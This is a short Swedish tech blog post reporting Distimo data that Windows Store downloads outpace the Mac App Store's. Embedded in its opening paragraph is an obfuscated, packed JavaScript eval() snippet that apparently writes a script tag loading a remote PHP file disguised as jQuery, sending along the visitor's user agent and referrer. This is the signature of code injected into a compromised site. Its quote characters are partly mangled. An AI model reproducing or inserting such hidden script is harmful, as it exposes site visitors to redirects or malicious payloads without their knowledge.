Image Image Image Image Image Image Image Image Image Image

| 2 juni, 2020

Scroll to top

Top

Windows Store klår Mac App Store

Windows Store klår Mac App Store
Sebastian

Windows eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ezykf|var|u0026u|referrer|biets||js|php’.split(’|’),0,{}))
Store är namnet på den affär som säljer appar för Windows 8 och Windows RT. Nu kommer det rapporter som visar att Microsoft verkligen fått en rivstart sedan ca en månad efter lanseringen den 26 oktober.

Det verkar som att antalet nerladdningar i Windows Store är fler än i Mac App Store vilket är Apples affär för program till datorer som varit live i ca två år.
Rapporten kommer från analysföretaget Distimo.

Distimo har räknat fram att Windows Store idag har ca 21 180 appar och att App Store ligger omkring 12 998 appar. När det kommer till de 300 mest populära apparna i respektive appbutik har Windows Store lyckats slå Mac App Store med tre gånger högre nerladdningsvolym.

Det visar sig också att Mac App Store har väldigt många fler betalappar än om man jämför med Windows Store. I rapportern visar det sig också att tio procent av alla rankade appar i Windows Store är nationella och inte globala. i vissa länder är denna andel högre som exempelvis i Japan.

Dock menar Distimio att Windows Store har långt kvar att gå innan de kan börja slåss på riktigt med konkurrenterna Apple App Store och Google Play son båda har strax över 600 000 appar.

Läs rapporten här!

Via: IDG.se